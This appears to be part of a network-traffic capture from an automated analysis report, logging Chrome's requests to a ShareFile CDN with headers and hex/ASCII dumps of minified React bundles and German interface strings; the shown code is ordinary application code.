                                                                                                                                                                                                                      Vary: Origin
                                                                                                                                                                                                                      2024-11-05 19:36:18 UTC16384INData Raw: 2f 2f 40 70 69 6c 65 74 20 76 3a 32 28 77 65 62 70 61 63 6b 43 68 75 6e 6b 70 72 5f 73 68 61 72 65 66 69 6c 65 64 65 76 63 6c 69 65 6e 74 70 69 6c 65 74 2c 7b 7d 29 0a 53 79 73 74 65 6d 2e 72 65 67 69 73 74 65 72 28 5b 22 40 63 69 74 72 69 74 65 2f 73 66 2d 61 70 69 22 2c 22 40 73 68 61 72 65 66 69 6c 65 64 65 76 2f 61 6e 74 64 2d 63 6f 6e 66 69 67 22 2c 22 61 6e 74 64 22 2c 22 72 65 61 63 74 22 2c 22 72 65 61 63 74 2d 64 6f 6d 22 2c 22 72 65 61 63 74 2d 72 6f 75 74 65 72 22 2c 22 72 65 61 63 74 2d 72 6f 75 74 65 72 2d 64 6f 6d 22 2c 22 74 73 6c 69 62 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 29 7b 76 61 72 20 74 3d 7b 7d 2c 72 3d 7b 7d 2c 69 3d 7b 7d 2c 6f 3d 7b 7d 2c 61 3d 7b 7d 2c 73 3d 7b 7d 2c 75 3d 7b 7d 2c 63 3d 7b 7d 3b 72 65 74 75 72 6e 20
                                                                                                                                                                                                                      Data Ascii: //@pilet v:2(webpackChunkpr_sharefiledevclientpilet,{})System.register(["@citrite/sf-api","@sharefiledev/antd-config","antd","react","react-dom","react-router","react-router-dom","tslib"],(function(e,n){var t={},r={},i={},o={},a={},s={},u={},c={};return
                                                                                                                                                                                                                      2024-11-05 19:36:18 UTC16384INData Raw: 74 75 72 6e 22 71 75 65 75 65 22 3d 3d 3d 65 3f 22 70 72 65 70 65 6e 64 51 75 65 75 65 22 3a 65 3f 22 70 72 65 70 65 6e 64 22 3a 22 61 70 70 65 6e 64 22 7d 28 72 29 2c 73 3d 22 70 72 65 70 65 6e 64 51 75 65 75 65 22 3d 3d 3d 61 2c 75 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 74 79 6c 65 22 29 3b 75 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 24 2c 61 29 2c 73 26 26 6f 26 26 75 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 4b 2c 22 22 2e 63 6f 6e 63 61 74 28 6f 29 29 2c 6e 75 6c 6c 21 3d 74 26 26 74 2e 6e 6f 6e 63 65 26 26 28 75 2e 6e 6f 6e 63 65 3d 6e 75 6c 6c 3d 3d 74 3f 76 6f 69 64 20 30 3a 74 2e 6e 6f 6e 63 65 29 2c 75 2e 69 6e 6e 65 72 48 54 4d 4c 3d 65 3b 76 61 72 20 63 3d 59 28 6e 29 2c 6c 3d 63 2e 66 69 72 73 74 43 68
                                                                                                                                                                                                                      Data Ascii: turn"queue"===e?"prependQueue":e?"prepend":"append"}(r),s="prependQueue"===a,u=document.createElement("style");u.setAttribute($,a),s&&o&&u.setAttribute(K,"".concat(o)),null!=t&&t.nonce&&(u.nonce=null==t?void 0:t.nonce),u.innerHTML=e;var c=Y(n),l=c.firstCh
                                                                                                                                                                                                                      2024-11-05 19:36:18 UTC16384INData Raw: 76 61 72 20 65 3d 74 68 69 73 2e 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 2e 61 63 63 65 73 73 54 6f 6b 65 6e 3b 72 65 74 75 72 6e 20 65 3f 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 65 3f 65 3a 28 30 2c 6e 65 2e 5a 29 28 6f 65 28 29 2e 6d 61 72 6b 28 28 66 75 6e 63 74 69 6f 6e 20 6e 28 29 7b 72 65 74 75 72 6e 20 6f 65 28 29 2e 77 72 61 70 28 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 66 6f 72 28 3b 3b 29 73 77 69 74 63 68 28 6e 2e 70 72 65 76 3d 6e 2e 6e 65 78 74 29 7b 63 61 73 65 20 30 3a 72 65 74 75 72 6e 20 6e 2e 61 62 72 75 70 74 28 22 72 65 74 75 72 6e 22 2c 65 29 3b 63 61 73 65 20 31 3a 63 61 73 65 22 65 6e 64 22 3a 72 65 74 75 72 6e 20 6e 2e 73 74 6f 70 28 29 7d 7d 29 2c 6e 29 7d 29 29 29 3a 75 6e 64 65 66 69 6e 65 64 7d 7d 2c 7b 6b 65 79
                                                                                                                                                                                                                      Data Ascii: var e=this.configuration.accessToken;return e?"function"==typeof e?e:(0,ne.Z)(oe().mark((function n(){return oe().wrap((function(n){for(;;)switch(n.prev=n.next){case 0:return n.abrupt("return",e);case 1:case"end":return n.stop()}}),n)}))):undefined}},{key
                                                                                                                                                                                                                      2024-11-05 19:36:18 UTC15256INData Raw: 64 65 64 42 6c 6f 63 6b 52 49 44 22 2c 27 52 65 71 75 69 72 65 64 20 70 61 72 61 6d 65 74 65 72 20 22 65 6e 63 6f 64 65 64 42 6c 6f 63 6b 52 49 44 22 20 77 61 73 20 6e 75 6c 6c 20 6f 72 20 75 6e 64 65 66 69 6e 65 64 20 77 68 65 6e 20 63 61 6c 6c 69 6e 67 20 64 65 6c 65 74 65 42 6c 6f 63 6b 28 29 2e 27 29 3b 63 61 73 65 20 32 3a 69 66 28 74 3d 7b 7d 2c 72 3d 7b 7d 2c 6e 75 6c 6c 21 3d 65 2e 78 42 66 66 43 73 72 66 26 26 28 72 5b 22 78 2d 62 66 66 2d 63 73 72 66 22 5d 3d 53 74 72 69 6e 67 28 65 2e 78 42 66 66 43 73 72 66 29 29 2c 21 74 68 69 73 2e 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 7c 7c 21 74 68 69 73 2e 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 2e 61 63 63 65 73 73 54 6f 6b 65 6e 29 7b 6f 2e 6e 65 78 74 3d 39 3b 62 72 65 61 6b 7d 72 65 74 75 72 6e 20 6f
                                                                                                                                                                                                                      Data Ascii: dedBlockRID",'Required parameter "encodedBlockRID" was null or undefined when calling deleteBlock().');case 2:if(t={},r={},null!=e.xBffCsrf&&(r["x-bff-csrf"]=String(e.xBffCsrf)),!this.configuration||!this.configuration.accessToken){o.next=9;break}return o
                                                                                                                                                                                                                      2024-11-05 19:36:18 UTC16384INData Raw: 2e 78 42 66 66 43 73 72 66 26 26 28 72 5b 22 78 2d 62 66 66 2d 63 73 72 66 22 5d 3d 53 74 72 69 6e 67 28 65 2e 78 42 66 66 43 73 72 66 29 29 2c 21 74 68 69 73 2e 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 7c 7c 21 74 68 69 73 2e 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 2e 61 63 63 65 73 73 54 6f 6b 65 6e 29 7b 6f 2e 6e 65 78 74 3d 31 31 3b 62 72 65 61 6b 7d 72 65 74 75 72 6e 20 6f 2e 6e 65 78 74 3d 31 30 2c 74 68 69 73 2e 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 2e 61 63 63 65 73 73 54 6f 6b 65 6e 28 22 4f 41 75 74 68 32 2d 54 65 73 74 22 2c 5b 22 73 6f 6c 75 74 69 6f 6e 76 69 65 77 65 6e 67 69 6e 65 3a 76 69 65 77 2e 72 65 61 64 22 2c 22 73 6f 6c 75 74 69 6f 6e 76 69 65 77 65 6e 67 69 6e 65 3a 76 69 65 77 2e 77 72 69 74 65 22 2c 22 73 6f 6c 75 74 69 6f 6e 76 69
                                                                                                                                                                                                                      Data Ascii: .xBffCsrf&&(r["x-bff-csrf"]=String(e.xBffCsrf)),!this.configuration||!this.configuration.accessToken){o.next=11;break}return o.next=10,this.configuration.accessToken("OAuth2-Test",["solutionviewengine:view.read","solutionviewengine:view.write","solutionvi
                                                                                                                                                                                                                      2024-11-05 19:36:18 UTC16384INData Raw: 2e 70 61 72 65 6e 74 5a 6f 6e 65 52 49 44 7d 29 29 3b 72 65 74 75 72 6e 5b 65 2c 74 5d 7d 29 2c 5b 6e 5d 29 2c 73 3d 28 30 2c 42 65 2e 5a 29 28 61 2c 32 29 2c 75 3d 73 5b 30 5d 2c 63 3d 73 5b 31 5d 2c 6c 3d 52 65 5b 22 64 65 66 61 75 6c 74 22 5d 2e 75 73 65 4d 65 6d 6f 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 5b 75 5d 7d 29 2c 5b 75 5d 29 3b 72 65 74 75 72 6e 20 52 65 5b 22 64 65 66 61 75 6c 74 22 5d 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 43 65 2c 7b 76 69 65 77 3a 75 2c 70 69 6c 65 74 41 70 69 3a 74 2c 62 6c 6f 63 6b 52 49 44 3a 75 2e 72 6f 6f 74 42 6c 6f 63 6b 52 49 44 2c 63 68 61 6e 67 65 56 69 65 77 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 2c 61 6c 6c 56 69 65 77 73 3a 6c 2c 63 6f 6e 74 72 61 63 74 53 6f 75 72 63 65 73 3a 6f 7d 2c
                                                                                                                                                                                                                      Data Ascii: .parentZoneRID}));return[e,t]}),[n]),s=(0,Be.Z)(a,2),u=s[0],c=s[1],l=Re["default"].useMemo((function(){return[u]}),[u]);return Re["default"].createElement(Ce,{view:u,piletApi:t,blockRID:u.rootBlockRID,changeView:function(){},allViews:l,contractSources:o},
                                                                                                                                                                                                                      2024-11-05 19:36:19 UTC16384INData Raw: 6f 66 20 65 3b 72 65 74 75 72 6e 20 6e 75 6c 6c 21 3d 65 26 26 28 22 6f 62 6a 65 63 74 22 3d 3d 6e 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 6e 29 7d 7d 2c 33 37 30 30 35 3a 65 3d 3e 7b 65 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 21 3d 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 7d 7d 2c 33 33 34 34 38 3a 28 65 2c 6e 2c 74 29 3d 3e 7b 76 61 72 20 72 3d 74 28 34 34 32 33 39 29 2c 69 3d 74 28 33 37 30 30 35 29 3b 65 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 22 73 79 6d 62 6f 6c 22 3d 3d 74 79 70 65 6f 66 20 65 7c 7c 69 28 65 29 26 26 22 5b 6f 62 6a 65 63 74 20 53 79 6d 62 6f 6c 5d 22 3d 3d 72 28 65 29 7d 7d 2c 38 38 33 30 36 3a 28 65 2c 6e 2c 74
                                                                                                                                                                                                                      Data Ascii: of e;return null!=e&&("object"==n||"function"==n)}},37005:e=>{e.exports=function(e){return null!=e&&"object"==typeof e}},33448:(e,n,t)=>{var r=t(44239),i=t(37005);e.exports=function(e){return"symbol"==typeof e||i(e)&&"[object Symbol]"==r(e)}},88306:(e,n,t
                                                                                                                                                                                                                      2024-11-05 19:36:19 UTC14808INData Raw: 3d 3d 3d 53 79 6d 62 6f 6c 26 26 65 21 3d 3d 53 79 6d 62 6f 6c 2e 70 72 6f 74 6f 74 79 70 65 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 2c 72 28 65 29 7d 74 2e 64 28 6e 2c 7b 5a 3a 28 29 3d 3e 72 7d 29 7d 2c 34 30 31 38 31 3a 28 65 2c 6e 2c 74 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 74 2e 64 28 6e 2c 7b 5a 3a 28 29 3d 3e 69 7d 29 3b 76 61 72 20 72 3d 74 28 33 30 39 30 37 29 3b 66 75 6e 63 74 69 6f 6e 20 69 28 65 2c 6e 29 7b 69 66 28 65 29 7b 69 66 28 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 65 29 72 65 74 75 72 6e 28 30 2c 72 2e 5a 29 28 65 2c 6e 29 3b 76 61 72 20 74 3d 7b 7d 2e 74 6f 53 74 72 69 6e 67 2e 63 61 6c 6c 28 65 29 2e 73 6c 69 63 65 28 38 2c 2d 31 29 3b 72 65 74 75 72 6e 22 4f 62 6a 65 63 74 22 3d 3d 3d 74 26
                                                                                                                                                                                                                      Data Ascii: ===Symbol&&e!==Symbol.prototype?"symbol":typeof e},r(e)}t.d(n,{Z:()=>r})},40181:(e,n,t)=>{"use strict";t.d(n,{Z:()=>i});var r=t(30907);function i(e,n){if(e){if("string"==typeof e)return(0,r.Z)(e,n);var t={}.toString.call(e).slice(8,-1);return"Object"===t&
                                                                                                                                                                                                                      2024-11-05 19:36:19 UTC1576INData Raw: 43 6f 64 65 73 28 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 66 61 6c 6c 62 61 63 6b 4c 6e 67 2c 6e 2e 6c 6e 67 7c 7c 74 68 69 73 2e 6c 61 6e 67 75 61 67 65 29 3b 69 66 28 22 66 61 6c 6c 62 61 63 6b 22 3d 3d 3d 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 73 61 76 65 4d 69 73 73 69 6e 67 54 6f 26 26 4e 26 26 4e 5b 30 5d 29 66 6f 72 28 76 61 72 20 5f 3d 30 3b 5f 3c 4e 2e 6c 65 6e 67 74 68 3b 5f 2b 2b 29 7a 2e 70 75 73 68 28 4e 5b 5f 5d 29 3b 65 6c 73 65 22 61 6c 6c 22 3d 3d 3d 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 73 61 76 65 4d 69 73 73 69 6e 67 54 6f 3f 7a 3d 74 68 69 73 2e 6c 61 6e 67 75 61 67 65 55 74 69 6c 73 2e 74 6f 52 65 73 6f 6c 76 65 48 69 65 72 61 72 63 68 79 28 6e 2e 6c 6e 67 7c 7c 74 68 69 73 2e 6c 61 6e 67 75 61 67 65 29 3a 7a 2e 70 75 73 68 28 6e 2e
                                                                                                                                                                                                                      Data Ascii: Codes(this.options.fallbackLng,n.lng||this.language);if("fallback"===this.options.saveMissingTo&&N&&N[0])for(var _=0;_<N.length;_++)z.push(N[_]);else"all"===this.options.saveMissingTo?z=this.languageUtils.toResolveHierarchy(n.lng||this.language):z.push(n.
                                                                                                                                                                                                                      2024-11-05 19:36:19 UTC16384INData Raw: 72 70 6f 6c 61 74 69 6f 6e 2e 73 6b 69 70 4f 6e 56 61 72 69 61 62 6c 65 73 3a 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 69 6e 74 65 72 70 6f 6c 61 74 69 6f 6e 2e 73 6b 69 70 4f 6e 56 61 72 69 61 62 6c 65 73 29 3b 69 66 28 73 29 7b 76 61 72 20 75 3d 65 2e 6d 61 74 63 68 28 74 68 69 73 2e 69 6e 74 65 72 70 6f 6c 61 74 6f 72 2e 6e 65 73 74 69 6e 67 52 65 67 65 78 70 29 3b 61 3d 75 26 26 75 2e 6c 65 6e 67 74 68 7d 76 61 72 20 63 3d 74 2e 72 65 70 6c 61 63 65 26 26 22 73 74 72 69 6e 67 22 21 3d 74 79 70 65 6f 66 20 74 2e 72 65 70 6c 61 63 65 3f 74 2e 72 65 70 6c 61 63 65 3a 74 3b 69 66 28 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 69 6e 74 65 72 70 6f 6c 61 74 69 6f 6e 2e 64 65 66 61 75 6c 74 56 61 72 69 61 62 6c 65 73 26 26 28 63 3d 4d 28 4d 28 7b 7d 2c 74 68 69 73
                                                                                                                                                                                                                      Data Ascii: rpolation.skipOnVariables:this.options.interpolation.skipOnVariables);if(s){var u=e.match(this.interpolator.nestingRegexp);a=u&&u.length}var c=t.replace&&"string"!=typeof t.replace?t.replace:t;if(this.options.interpolation.defaultVariables&&(c=M(M({},this


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      103192.168.2.174982313.227.219.304437144C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-05 19:36:18 UTC572OUTGET /sharefile-web/sharefiledev-client-pilet/0.10.6/package/dist/main.css HTTP/1.1
                                                                                                                                                                                                                      Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                      Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                      Sec-Fetch-Dest: style
                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                      2024-11-05 19:36:18 UTC506INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Content-Type: text/css
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Date: Tue, 05 Nov 2024 10:55:24 GMT
                                                                                                                                                                                                                      Last-Modified: Tue, 22 Oct 2024 22:57:01 GMT
                                                                                                                                                                                                                      ETag: "d41d8cd98f00b204e9800998ecf8427e"
                                                                                                                                                                                                                      x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      Server: AmazonS3
                                                                                                                                                                                                                      X-Cache: Hit from cloudfront
                                                                                                                                                                                                                      Via: 1.1 4e4c50c641418e6aad9ec09cb0f22844.cloudfront.net (CloudFront)
                                                                                                                                                                                                                      X-Amz-Cf-Pop: AMS54-C1
                                                                                                                                                                                                                      X-Amz-Cf-Id: qjJEa_q7AMZnA7zzEVWLUiwNOaTvmZT6JiocTYazjpj2hoceuYb-LQ==
                                                                                                                                                                                                                      Age: 31255
                                                                                                                                                                                                                      Vary: Origin


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      104192.168.2.174982413.227.219.304437144C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-05 19:36:19 UTC604OUTGET /sharefile-web/sharefiledev-projects-pilet/2.1.15/package/dist/index.js HTTP/1.1
                                                                                                                                                                                                                      Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                      Origin: https://averellharriman.sharefile.com
                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                      Sec-Fetch-Dest: script
                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                      2024-11-05 19:36:19 UTC590INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Content-Type: application/x-javascript
                                                                                                                                                                                                                      Content-Length: 308129
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Last-Modified: Tue, 22 Oct 2024 23:45:49 GMT
                                                                                                                                                                                                                      x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      Server: AmazonS3
                                                                                                                                                                                                                      Date: Tue, 05 Nov 2024 19:36:20 GMT
                                                                                                                                                                                                                      ETag: "aaa88d2636dfeb090b5625da19c6583b"
                                                                                                                                                                                                                      X-Cache: RefreshHit from cloudfront
                                                                                                                                                                                                                      Via: 1.1 df4167ab0949b4d2c15466bdfdc05f94.cloudfront.net (CloudFront)
                                                                                                                                                                                                                      X-Amz-Cf-Pop: AMS54-C1
                                                                                                                                                                                                                      X-Amz-Cf-Id: BfRUJebnnNIvA4LK_1vjXP3JDeA2xvD4tOlj7waYBQSaQ1n9zlv5bw==
                                                                                                                                                                                                                      Access-Control-Allow-Origin: https://averellharriman.sharefile.com
                                                                                                                                                                                                                      Vary: Origin
                                                                                                                                                                                                                      2024-11-05 19:36:19 UTC16384INData Raw: 2f 2f 40 70 69 6c 65 74 20 76 3a 32 28 77 65 62 70 61 63 6b 43 68 75 6e 6b 70 72 5f 73 68 61 72 65 66 69 6c 65 64 65 76 70 72 6f 6a 65 63 74 73 70 69 6c 65 74 2c 7b 7d 29 0a 53 79 73 74 65 6d 2e 72 65 67 69 73 74 65 72 28 5b 22 40 63 69 74 72 69 74 65 2f 73 66 2d 61 70 69 22 2c 22 40 73 68 61 72 65 66 69 6c 65 64 65 76 2f 61 6e 74 64 2d 63 6f 6e 66 69 67 22 2c 22 61 6e 74 64 22 2c 22 72 65 61 63 74 22 2c 22 72 65 61 63 74 2d 64 6f 6d 22 2c 22 72 65 61 63 74 2d 72 6f 75 74 65 72 22 2c 22 72 65 61 63 74 2d 72 6f 75 74 65 72 2d 64 6f 6d 22 2c 22 74 73 6c 69 62 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 7b 7d 2c 72 3d 7b 7d 2c 6f 3d 7b 7d 2c 61 3d 7b 7d 2c 69 3d 7b 7d 2c 63 3d 7b 7d 2c 73 3d 7b 7d 2c 75 3d 7b 7d 3b 72 65 74 75 72
                                                                                                                                                                                                                      Data Ascii: //@pilet v:2(webpackChunkpr_sharefiledevprojectspilet,{})System.register(["@citrite/sf-api","@sharefiledev/antd-config","antd","react","react-dom","react-router","react-router-dom","tslib"],(function(e,t){var n={},r={},o={},a={},i={},c={},s={},u={};retur
                                                                                                                                                                                                                      2024-11-05 19:36:19 UTC16384INData Raw: 3d 6e 28 34 35 30 34 32 29 2c 6f 3d 2f 5e 28 28 63 68 69 6c 64 72 65 6e 7c 64 61 6e 67 65 72 6f 75 73 6c 79 53 65 74 49 6e 6e 65 72 48 54 4d 4c 7c 6b 65 79 7c 72 65 66 7c 61 75 74 6f 46 6f 63 75 73 7c 64 65 66 61 75 6c 74 56 61 6c 75 65 7c 64 65 66 61 75 6c 74 43 68 65 63 6b 65 64 7c 69 6e 6e 65 72 48 54 4d 4c 7c 73 75 70 70 72 65 73 73 43 6f 6e 74 65 6e 74 45 64 69 74 61 62 6c 65 57 61 72 6e 69 6e 67 7c 73 75 70 70 72 65 73 73 48 79 64 72 61 74 69 6f 6e 57 61 72 6e 69 6e 67 7c 76 61 6c 75 65 4c 69 6e 6b 7c 61 62 62 72 7c 61 63 63 65 70 74 7c 61 63 63 65 70 74 43 68 61 72 73 65 74 7c 61 63 63 65 73 73 4b 65 79 7c 61 63 74 69 6f 6e 7c 61 6c 6c 6f 77 7c 61 6c 6c 6f 77 55 73 65 72 4d 65 64 69 61 7c 61 6c 6c 6f 77 50 61 79 6d 65 6e 74 52 65 71 75 65 73 74 7c
                                                                                                                                                                                                                      Data Ascii: =n(45042),o=/^((children|dangerouslySetInnerHTML|key|ref|autoFocus|defaultValue|defaultChecked|innerHTML|suppressContentEditableWarning|suppressHydrationWarning|valueLink|abbr|accept|acceptCharset|accessKey|action|allow|allowUserMedia|allowPaymentRequest|
                                                                                                                                                                                                                      2024-11-05 19:36:20 UTC16384INData Raw: 72 2d 6c 65 66 74 2d 77 69 64 74 68 3a 20 34 70 78 3b 5c 6e 5c 74 62 6f 72 64 65 72 2d 6c 65 66 74 2d 73 74 79 6c 65 3a 20 73 6f 6c 69 64 3b 5c 6e 5c 74 62 6f 78 2d 73 68 61 64 6f 77 3a 20 22 2c 22 3b 5c 6e 5c 74 22 2c 22 20 7b 5c 6e 5c 74 5c 74 62 6f 72 64 65 72 3a 20 75 6e 73 65 74 3b 5c 6e 5c 74 7d 5c 6e 22 5d 29 29 2c 66 2e 61 53 2e 62 6f 78 53 68 61 64 6f 77 2c 64 2e 76 41 29 2c 76 3d 28 30 2c 73 2e 5a 29 28 6d 29 28 61 7c 7c 28 61 3d 28 30 2c 63 2e 5a 29 28 5b 22 5c 6e 5c 74 70 61 64 64 69 6e 67 3a 20 38 70 78 20 22 2c 22 20 22 2c 22 3b 5c 6e 5c 74 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 20 73 6f 6c 69 64 3b 5c 6e 5c 74 62 6f 72 64 65 72 2d 77 69 64 74 68 3a 20 31 70 78 3b 5c 6e 5c 74 62 6f 72 64 65 72 2d 74 6f 70 2d 72 69 67 68 74 2d 72 61 64 69 75
                                                                                                                                                                                                                      Data Ascii: r-left-width: 4px;\n\tborder-left-style: solid;\n\tbox-shadow: ",";\n\t"," {\n\t\tborder: unset;\n\t}\n"])),f.aS.boxShadow,d.vA),v=(0,s.Z)(m)(a||(a=(0,c.Z)(["\n\tpadding: 8px "," ",";\n\tborder-style: solid;\n\tborder-width: 1px;\n\tborder-top-right-radiu
                                                                                                                                                                                                                      2024-11-05 19:36:20 UTC15108INData Raw: 6f 42 6f 72 64 65 72 3a 73 2e 69 4e 2c 69 6e 66 6f 42 61 63 6b 67 72 6f 75 6e 64 3a 73 2e 5f 43 2c 6d 6f 64 61 6c 42 61 63 6b 67 72 6f 75 6e 64 3a 73 2e 6f 72 2c 62 6c 61 64 65 42 61 63 6b 67 72 6f 75 6e 64 3a 73 2e 6f 72 2c 66 6c 79 6f 76 65 72 42 61 63 6b 67 72 6f 75 6e 64 3a 73 2e 65 43 2c 6c 69 73 74 49 74 65 6d 48 6f 76 65 72 42 61 63 6b 67 72 6f 75 6e 64 3a 73 2e 5a 50 2c 6c 69 73 74 49 74 65 6d 53 65 6c 65 63 74 65 64 42 61 63 6b 67 72 6f 75 6e 64 3a 73 2e 76 56 2c 70 72 69 6d 61 72 79 54 65 78 74 3a 73 2e 54 69 2c 73 65 63 6f 6e 64 61 72 79 54 65 78 74 3a 73 2e 6d 4b 2c 6d 65 74 61 64 61 74 61 54 65 78 74 3a 73 2e 6d 4b 2c 62 6f 72 64 65 72 3a 73 2e 6d 4b 2c 70 72 69 6d 61 72 79 41 70 70 42 61 63 6b 67 72 6f 75 6e 64 3a 73 2e 68 65 2c 70 72 69 6d
                                                                                                                                                                                                                      Data Ascii: oBorder:s.iN,infoBackground:s._C,modalBackground:s.or,bladeBackground:s.or,flyoverBackground:s.eC,listItemHoverBackground:s.ZP,listItemSelectedBackground:s.vV,primaryText:s.Ti,secondaryText:s.mK,metadataText:s.mK,border:s.mK,primaryAppBackground:s.he,prim
                                                                                                                                                                                                                      2024-11-05 19:36:20 UTC145INData Raw: 20 61 6e 7a 65 69 67 65 6e 22 2c 6f 6b 3a 22 4f 4b 22 7d 2c 6e 6f 3a 22 4e 65 69 6e 22 2c 70 65 72 63 65 6e 74 3a 22 7b 7b 70 65 72 63 65 6e 74 7d 7d 20 25 22 2c 73 68 6f 77 5f 70 61 73 73 77 6f 72 64 3a 22 4b 65 6e 6e 77 6f 72 74 20 61 6e 7a 65 69 67 65 6e 22 2c 73 76 67 3a 7b 41 69 72 49 63 6f 6e 3a 22 41 49 52 2d 44 61 74 65 69 22 2c 41 6c 65 72 74 49 63 6f 6e 3a 22 46 65 68 6c 65 72 73 79 6d 62 6f 6c 22 2c 41 70 70 72 6f 76 61
                                                                                                                                                                                                                      Data Ascii: anzeigen",ok:"OK"},no:"Nein",percent:"{{percent}} %",show_password:"Kennwort anzeigen",svg:{AirIcon:"AIR-Datei",AlertIcon:"Fehlersymbol",Approva
                                                                                                                                                                                                                      2024-11-05 19:36:20 UTC16384INData Raw: 6c 73 46 69 6c 65 49 63 6f 6e 3a 22 47 65 6e 65 68 6d 69 67 75 6e 67 73 64 61 74 65 69 22 2c 41 75 64 69 6f 49 63 6f 6e 3a 22 41 75 64 69 6f 64 61 74 65 69 22 2c 43 6f 64 65 46 69 6c 65 49 63 6f 6e 3a 22 43 6f 64 65 64 61 74 65 69 22 2c 43 77 46 6f 72 6d 49 63 6f 6e 3a 22 46 6f 72 6d 75 6c 61 72 76 6f 72 6c 61 67 65 22 2c 43 77 54 65 6d 70 6c 61 74 65 49 63 6f 6e 3a 22 57 6f 72 6b 66 6c 6f 77 76 6f 72 6c 61 67 65 22 2c 43 77 57 6f 72 6b 66 6c 6f 77 49 63 6f 6e 3a 22 57 6f 72 6b 66 6c 6f 77 69 6e 73 74 61 6e 7a 22 2c 44 63 6d 49 63 6f 6e 3a 22 44 43 4d 2d 44 61 74 65 69 22 2c 44 77 67 49 63 6f 6e 3a 22 44 57 47 2d 44 61 74 65 69 22 2c 45 6d 61 69 6c 49 63 6f 6e 3a 22 45 2d 4d 61 69 6c 2d 44 61 74 65 69 22 2c 45 6d 70 74 79 34 30 34 49 63 6f 6e 3a 22 44 61
                                                                                                                                                                                                                      Data Ascii: lsFileIcon:"Genehmigungsdatei",AudioIcon:"Audiodatei",CodeFileIcon:"Codedatei",CwFormIcon:"Formularvorlage",CwTemplateIcon:"Workflowvorlage",CwWorkflowIcon:"Workflowinstanz",DcmIcon:"DCM-Datei",DwgIcon:"DWG-Datei",EmailIcon:"E-Mail-Datei",Empty404Icon:"Da
